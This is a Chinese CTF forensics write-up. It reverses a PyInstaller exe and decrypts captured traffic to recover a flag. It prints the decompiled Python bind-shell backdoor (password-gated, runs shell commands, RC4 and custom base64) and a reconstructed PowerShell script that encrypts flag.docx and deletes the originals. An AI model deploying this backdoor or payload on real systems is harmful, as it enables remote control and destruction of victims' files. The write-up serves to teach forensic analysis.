分享一道好的misc题


拯救客服小祥

首先下载附件得到一个exe文件、密文以及流量包

exe运行没显示,查看exe是什么编译的

得知是python文件,使用pyinstxtractor解包

pyc反编译为py文件

完整代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# Source Generated with Decompyle++
# File: explorer.pyc (Python 3.10)

import socket
import os
import subprocess

def IIol0OlIll(o00oo1l0O1 = None, OIOlIO1Iol = None):
IlIIoOl0O1 = 0
O10OllOlIO = list(range(256))
for lolOoIOlIo in range(256):
IlIIoOl0O1 = (IlIIoOl0O1 + O10OllOlIO[lolOoIOlIo] + ord(OIOlIO1Iol[lolOoIOlIo % len(OIOlIO1Iol)])) % 256
O10OllOlIO[lolOoIOlIo] = O10OllOlIO[IlIIoOl0O1]
O10OllOlIO[IlIIoOl0O1] = O10OllOlIO[lolOoIOlIo]
IlIIoOl0O1 = 0
I0o1l01olI = 0
olo0OOoI1o = []
for o01IO1Oool in o00oo1l0O1:
IlIIoOl0O1 = (IlIIoOl0O1 + 1) % 256
I0o1l01olI = (I0o1l01olI + O10OllOlIO[IlIIoOl0O1]) % 256
O10OllOlIO[IlIIoOl0O1] = O10OllOlIO[I0o1l01olI]
O10OllOlIO[I0o1l01olI] = O10OllOlIO[IlIIoOl0O1]
olo0OOoI1o.append(o01IO1Oool ^ O10OllOlIO[(O10OllOlIO[IlIIoOl0O1] + O10OllOlIO[I0o1l01olI]) % 256])
return bytes(olo0OOoI1o)

O1Il1I01oI = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0PQRSTUVWXYZO123456789+/='

def OlolI1lI1l(o00oo1l0O1 = None):
o00oo1l0O1 = o00oo1l0O1.decode()
olo0OOoI1o = []
for OlIoo1lIll in range(0, len(o00oo1l0O1), 4):
lolOoIOlIo = None
olo0OOoI1o.append((OlIoo1lIll[0] << 2) + (OlIoo1lIll[1] >> 4))
if OlIoo1lIll[2] == 64:
return bytes(olo0OOoI1o)
None.append(((OlIoo1lIll[1] & 15) << 4) + (OlIoo1lIll[2] >> 2))
if OlIoo1lIll[3] == 64:
return bytes(olo0OOoI1o)
None.append(((OlIoo1lIll[2] & 3) << 6) + OlIoo1lIll[3])
return bytes(olo0OOoI1o)


def OlOI01O0Oo(o00oo1l0O1 = None):
olo0OOoI1o = []
for OlIoo1lIll in range(0, len(o00oo1l0O1), 3):
lolOoIOlIo = None
olo0OOoI1o.append(O1Il1I01oI[OlIoo1lIll[0] >> 2])
if len(OlIoo1lIll) == 1:
olo0OOoI1o.append(O1Il1I01oI[(OlIoo1lIll[0] & 3) << 4])
olo0OOoI1o.append('==')
else:
olo0OOoI1o.append(O1Il1I01oI[((OlIoo1lIll[0] & 3) << 4) + (OlIoo1lIll[1] >> 4)])
if len(OlIoo1lIll) == 2:
olo0OOoI1o.append(O1Il1I01oI[(OlIoo1lIll[1] & 15) << 2])
olo0OOoI1o.append('=')
else:
olo0OOoI1o.append(O1Il1I01oI[((OlIoo1lIll[1] & 15) << 2) + (OlIoo1lIll[2] >> 6)])
olo0OOoI1o.append(O1Il1I01oI[OlIoo1lIll[2] & 63])
return ''.join(olo0OOoI1o).encode()

I0lo1olIll = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
I0lo1olIll.bind(('0.0.0.0', 11451))
I0lo1olIll.listen(1)
(I1l01110Il, _) = I0lo1olIll.accept()
if I1l01110Il.recv(1024) != b'mambaout':
I1l01110Il.close()
continue
I1l01110Il.send(b'welcome')
if o00oo1l0O1 = I1l01110Il.recv(1024) != b'':
o00oo1l0O1 = OlolI1lI1l(o00oo1l0O1)
o00oo1l0O1 = IIol0OlIll(o00oo1l0O1, 'mambaout')
if o00oo1l0O1.startswith(b'cd '):
os.chdir(o00oo1l0O1[3:].decode())
I1l01110Il.send(b'')
elif o00oo1l0O1.startswith(b'exit'):
I1l01110Il.close()
else:
data = OlOI01O0Oo(IIol0OlIll(subprocess.run(o00oo1l0O1.decode(), True, True, **('shell', 'capture_output')).stdout, 'mikumiku'))
if not o00oo1l0O1 = I1l01110Il.recv(1024) != b'':
continue

看得出来代码做了混淆,又有base换表又有RC4加密

再看流量包文件

将此内容保存为1.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
mambaout
welcome
/91GoZwO
VqIzSlBK+tRsG0RKMO+Y4Dd6nO/q3Qe=
7nX9
/70DB2flyeBWXJfDqoj/EgHCy3pB0n/rDXmo1FwwUsSbnIbYtPgVokthWpi43wPcDYD7zz7s1Qm6ByTCS2SC9fsHQRJuEVd9kzHzdLBtEN6WWBT35+NQa+xdZYfH8WGCDRQAo8qpxlIrWWF/VAgG07gS6AVSnrfFGvJAG2POK7eZexVbsNrh9geFz+uOUeRUcm46YhnSVQ1psreXA7qMULrpzahoPqURPSm9uUyMUJq+64YP7iZj+7/J4860rdk7v56zf/00SbWvM85NvpDmbngGkUINvABMbw1Nz+ftWaOCsenSrC0xlt1oKPV2WzgCKO/nWrodDAmjF6lpqnYa7+INcquC4cONZ65h+2Jz6yS8oYh59nS6yOclpa5RiHMqMYBKcTlq5N4IDpBywJEND+ZtYbdLVkQzSzRwOYbBaGLmfAy43rrxUwI0RYNbBHzIYpRrjv57CtvKd2pYmWkiPSpWK2kxH94cqJwWBTkE
7DzNnxI79cMT70hUCqalxfNqMuMS4d/UO9C92vgXhZHaGNu=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxI34dg870l9Ca4ehqAsKe62RsJRHW==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
/mX/p3I28dVM/jx7
TqItRAJI5qdgImEa/W==
7nX9
/70DB2flyeBWXJfDqoj/EgHCy3pB0n/rDXmo1FwwUsSbnIbYtPgVokthWpi43wPcDYD7zz7s1Qm6ByTCS2SC9fsHQRJuEVd9kzHzdLBtEN6WWBT35+NQa+xdZYfH8WGCDRQAo8qpxlIrWWF/VAgG07gS6AVSnrfFGvJAG2POK7eZexVbsNrh9geFz+uOUeRUcm46YhnSVQ1psreXA7qMULrpzahoPqURPSm9uUyMUJq+64YP7iZj+7/J4860rdk7v56zf/00SbWvM85NvpDmbngGkUINvABMbw1Nz+ftWaOCsenSrC0xlt1oKPV2WzgCKO/nWrodDAmjF6lpqnYa7+INcquC4cONZ65h+2Jz6ySUkZpT+800BfgBpa55mqotGR4Y5dzmoh4IDpBywIkRyFRr1GE15oSPsvnOQIDXebLEaAKPZXTgQwI0VtRjF5EOlguZUv5VydLOgNl+jroDU8lJYIDryhM54E4hLp+OcvfCjdFJtBqVt3BjzqPS1aYQLq+z3NMo0Lbu71HR4HP1bt/KL06TBKOG9vY/i0zZLUVunzpQErjBBhb7LwGoJopf6j+aGCEiJe4+k9rCzYlTZTrVW3eAI7AeSa==
7DzNnxI74cYR/itGEfSfdvF7LgkG72Z8O5i9GqpWchDnLM5DCgm+3om=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIT9dcP5C2NnKvuhuJtGKEG4JI9G50S
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIg9ZU87BBss18JuNgcTbR/YHpC38KJGr2Ggw9yLwbyoJO9NG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIg9ZU87BBss18LCNh9L2l+722JO9CJNO2XaxPBM2uszd5/
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJOTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53hkNX4lgxXqLurIp2XVHRw6MXSKJGr2Ggw9yLwbyoJO9NG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2XVVVwkZG4HKO1kXhdHeIta=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53c3559Y/EJqgDbIp2W+g7bwJVnGT9NkFvLPrLgziFg1WKFlYkJPqF5Y5UzqREG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxI7+Jd00mNJEtrACNEcYKsG02gZW9i9M1g/nYz7TtenEYjUGR72A3ejjSB9S4G3blWAAuLaQypBvhH5nQA321KXVSf6QUubRup4da==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2WpR7dp8W9LXJWY/mtyF2Iv1jcibWjVljaXqs9MX+kT0bmnLfXyEM8ZBx3uqiS+5QKHXLVDzNQaj7hY7CVx+Y/E8ASNoR5xojrk+evBOTnS+sbvDGKWbvu5wYHZAb0ZwVCnaCHP5ia==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53hkNX4lgxXqLuwowLOsaSXpCW9HYOgd8wdj9YM5ZEWqhWj3UegDtF5lTP4H0EUmCE1Lm5SI5tZ4wiS/aIJyTHjX5QUTvS1+7dnwhP7tZBQxE5jpoxttGBLBG/p4mlGu37u4fdae11akur4xBQ85lpq4KyDj6
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIGTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s2hUklajK0fuHIp2XVVVwkZG4HKO1kXhdHeIta=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2XVVVwkZG4HKO1kXhdHeIta=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s6hWD3awtqguHIp22VNQNYTZCLT3Ks8f3Dq1hfpjq==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxI7+Jd00mNawtqguvFDLaVY02Y0O81s8hk8fhLBLserEdLUI53naGXqwCYXPTr2b+K7qqOz/CZumb4wiERMIHzQ9je2VQrBVrp7xmoILFM3zjYDUG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s2hUklajK0fuHIp2WpR7ZpCW6zsJWY/fZyF2JavngHUNEEOA3Ocmi2870G3kUH7vGPa
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2WpR7dp8W9LXJWY/mtyF2Iv1jcibWjVljaXqs9MX+kT0bmnLfXyEM8xqwNfRElcP2ODHR9LVQESe5X37t0S=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53hkNX4lgxXqLuwowLOsaSXpCW9HYOgd8wdj9YM5ZEWqhWj3UegDtF5lTP4H0EUmCE1Lm5SI5tZ4wiS/aIJyTHjX5QUTvS1+7dnwhP7tZBQxE5jpoxttGBLBG/p4mlGu37u4fdae11akur4xBQ85lpq4KyDj6
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s6hWD3awtqguHIzXGVRZbpAVivuJLhHseOqTu5ZEceHWl3FA25EAjkVT8arE+mAsta4QAoCjhL9blBMQHyiLTDzQD9b71ZedFwbYQM8jBho0pYfxu3GBLxYKFOSdw5CZrfBu14eXa3flQIt80CeBL88tif1dRNvi8nyaka2vQkata==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIGTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIV8dA9+0oVtrKtsv3PPNBR7ZdCUTLs8hk8fZykXcfmDtqIWlpMztnpiq==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIGTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2hWyg+EHqJDbIp2WYP7Z3O3y1Y3ex3wcGk2NfDBseHZRASoZan
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+NoKWyhajOPBdrIp23cC+I/NL0qZ9Nl+pN9yN1WglH8RZRBdjY9+AyM45mX8jomABXvaQ0o5nNH5C7IPLrG4S9D30A0v8ai=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+q2b54hGxOSfCHIp23cC+I/NL0qZ9Nl+pN9yN1WglH8RZRBdjY9+AyM45mX/ioKScaOjSSVzx29NBFB0NbuUVTW4TFDu
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIgXJU7/iJIodiLe37BLO6sUwBeGybP2NY8ffrnJMrppg00W7pLzsDtC4xZ8007Bkb1dHzbQAwFnJ41FEMPWruoLTD6QS1v7hYRgDx/LTg/bD3FUUYipv2XhXRlUESpdLqCJa5huG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIp8c+N/0IIxW8pubIwLesaYJcIN4zu9H3UrJzeM3HqEYWQGAlXEG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIp8c+N/0IIxW8pubIvKe62RsJRH849GqpWchDnLM5DCgm+3om=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7nX9
/70DB2flyeBWXJfDqoj/EgHCy3pB0n/rDXmo1FwwUsSbnIbYtPgVokthWpi43wPcDYD7zz7s1Qm6ByTCS2SC9fsHQRJuEVd9kzHzdLBtEN6WWBT35+NQa+xdZYfH8WGCDRQAo8qpxlIrWWF/VAgG07gS6AVSnrfFGvJAG2POK7eZexVbsNrh9geFz+uOUeRUcm46YhnSVQ1psreXA7qMULrpzahoPqURPSm9uUyMUJq+64YP7iZj+7/J4860rdk7v56zf/00SbWvM85NvpDmbngGkUINvABMbw1Nz+ftWaOCsenSrC0xlt1oKPV2WzgCKO/nWrodDAmjF6lpqnYa7+INcquC4cONZ65h+2Jz6ySUkZpT+800BfgBpa55mqotGR4Y5dzmoh4IDpBywIkRyFRr1GE15oSPsvnOQIDXebLEaAKPZXTgQwI0VtRjF5EOlguZUv5VydLOgNl+jroDU8lJYIDryhM54E4hHU+Mhv5nnJJYxBqVxwxtybpOaUjocDgz3NMo0Lbb8KjV4WrItgE9ltDXOg5APK2scizZLUVunzpQErjBFNdJq5Mr9QKRgbjsKDkEGfWRl9rtystHqsYniheAI7AeSg9BDTQwnPPdsU4Ms/jXWM2LrB2+gb17qpCw2pLXW8DHsHFYoWCsDAigw7BaiwJjs08=
+nP4pYQU/sEK5m2IuWmpxK3gKKsHOZp/M0PKN3+PchDhIseruIqIYVkSfZnDAzgY90b2o/9K
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7nX9
/70DB2flyeBWXJfDqoj/EgHCy3pB0n/rDXmo1FwwUsSbnIbYtPgVokthWpi43wPcDYD7zz7s1Qm6ByTCS2SC9fsHQRJuEVd9kzHzdLBtEN6WWBT35+NQa+xdZYfH8WGCDRQAo8qpxlIrWWF/VAgG07gS6AVSnrfFGvJAG2POK7eZexVbsNrh9geFz+uOUeRUcm46YhnSVQ1psreXA7qMULrpzahoPqURPSm9uUyMUJq+64YP7iZj+7/J4860rdk7v56zf/00SbWvM85NvpDmbngGkUINvABMbw1Nz+ftWaOCsenSrC0xlt1oKPV2WzgCKO7nWrodDAmjF6lpqnYa7+INcquC4cONZ65h+2JzYUrYEaZt5SS0DO+AlGf6mHMcIAO09s9moh4IDpBywIkRyFRdXaFZURHUauTTUqqpwL1Hp7q0ZWbyQhQNVJNtBPYNnNqQUv5VydLOgNl+jroDQSdVK3mABN2G7i9I1BU6wqjncr3JtBqVt3BjCqROaUjocDgn3UfytltDpu598HzIhdp0D24HMhKt7vXi1bUjU8hunzpQErjBFNdJq4YrBN/x/bzADu18hfW/k9rvyIpHqI2nljd/beW2C5Y4GsWlZlDP
7C1MlG==

写一个脚本解密1.txt

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from Crypto.Cipher import ARC4
import base64

lns = open('D:\\tmp\\拯救客服小祥附件\\1.txt').readlines()

string1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0PQRSTUVWXYZO123456789+/='
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
for i in range(2,len(lns)):
x = lns[i].strip()
y = base64.b64decode(x.translate(str.maketrans(string1, string2)))
if i%2==0:
print('-'*60)
rc41 = ARC4.new(b'mambaout')
z = rc41.decrypt(y)
else:
rc42 = ARC4.new(b'mikumiku')
z = rc42.decrypt(y)
print(str(z,'gbk'))

运行得到

将完整内容保存到2.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
------------------------------------------------------------
whoami
buyixin\administrator


------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:18 12,400 flag.docx

2 个文件 5,660,764 字节

2 个目录 41,051,615,232 可用字节


------------------------------------------------------------
echo fakeflag{aaabbbccc} > flag.txt
Command executed successfully
------------------------------------------------------------
echo justforfun > key.txt
Command executed successfully
------------------------------------------------------------
type key.txt
justforfun


------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:18 12,400 flag.docx

2024/12/10 23:19 22 flag.txt

2024/12/10 23:19 13 key.txt

4 个文件 5,660,799 字节

2 个目录 41,056,251,904 可用字节


------------------------------------------------------------
echo function o0oIoIol0o { >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo param ( >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo [byte[]]$IoI0O10IOO, >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo [byte[]]$OOIOlI1l10 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo ) >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $I0oOoIIoOl = 0..255 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = 0 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $Io1o10lOlI = $IoI0O10IOO.Length >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo for ($loO0OO01oo = 0; $loO0OO01oo -lt 256; $loO0OO01oo++) { >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = ($ooo00l01oI + $I0oOoIIoOl[$loO0OO01oo] + $IoI0O10IOO[$loO0OO01oo % $Io1o10lOlI]) % 256 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $I0oOoIIoOl[$loO0OO01oo], $I0oOoIIoOl[$ooo00l01oI] = $I0oOoIIoOl[$ooo00l01oI], $I0oOoIIoOl[$loO0OO01oo] >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo } >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $loO0OO01oo = 0 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = 0 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $llOI0OOOlo = @() >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo for ($OOOllooo = 0; $OOOllooo -lt $OOIOlI1l10.Length; $OOOllooo++) { >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $loO0OO01oo = ($loO0OO01oo + 1) % 256 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = ($ooo00l01oI + $I0oOoIIoOl[$loO0OO01oo]) % 256 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $I0oOoIIoOl[$loO0OO01oo], $I0oOoIIoOl[$ooo00l01oI] = $I0oOoIIoOl[$ooo00l01oI], $I0oOoIIoOl[$loO0OO01oo] >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $llOI0OOOlo += $OOIOlI1l10[$OOOllooo] -bxor $I0oOoIIoOl[($I0oOoIIoOl[$loO0OO01oo] + $I0oOoIIoOl[$ooo00l01oI]) % 256] >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo } >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo return [byte[]]$llOI0OOOlo >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo } >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooOIl1loII = 'flag.docx' >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $o1lIlO1110 = [System.IO.File]::ReadAllBytes($ooOIl1loII) >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $lOIoloI0oO = [System.IO.File]::ReadAllBytes('key.txt') >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo [System.IO.File]::WriteAllBytes('flag.docx.enc', (o0oIoIol0o $lOIoloI0oO $o1lIlO1110)) >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo Remove-Item $ooOIl1loII >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo Remove-Item 'key.txt' >> payload.ps1
Command executed successfully
------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:18 12,400 flag.docx

2024/12/10 23:19 22 flag.txt

2024/12/10 23:19 13 key.txt

2024/12/10 23:19 1,212 payload.ps1

5 个文件 5,662,011 字节

2 个目录 41,055,326,208 可用字节


------------------------------------------------------------
powershell -ExecutionPolicy Bypass -File .\payload.ps1
Command executed successfully
------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:19 12,400 flag.docx.enc

2024/12/10 23:19 22 flag.txt

2024/12/10 23:19 1,212 payload.ps1

4 个文件 5,661,998 字节

2 个目录 41,055,301,632 可用字节


------------------------------------------------------------
exit

看得出来是powershell里有RC4,密钥也有

1
2
3
4
5
6
7
8
echo fakeflag{aaabbbccc} > flag.txt
Command executed successfully
------------------------------------------------------------
echo justforfun > key.txt
Command executed successfully


echo $ooo00l01oI = ($ooo00l01oI + $I0oOoIIoOl[$loO0OO01oo] + $IoI0O10IOO[$loO0OO01oo % $Io1o10lOlI]) % 256 >> payload.ps1

还剩下一个密文附件,对其进行RC4解密

密钥是

1
6A 75 73 74 66 6F 72 66 75 6E 20 0D 0A

注意

1
0D 0A就是\r\n,windows系统的换行

赛博厨子进行解密

保存到本地文件

一看就是docx文件,修改后缀.docx打开

最后flag为

1
flag{4b0917f6-5878-4514-99c2-33683f514ca8}

文章作者: yiqing
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yiqing !
  目录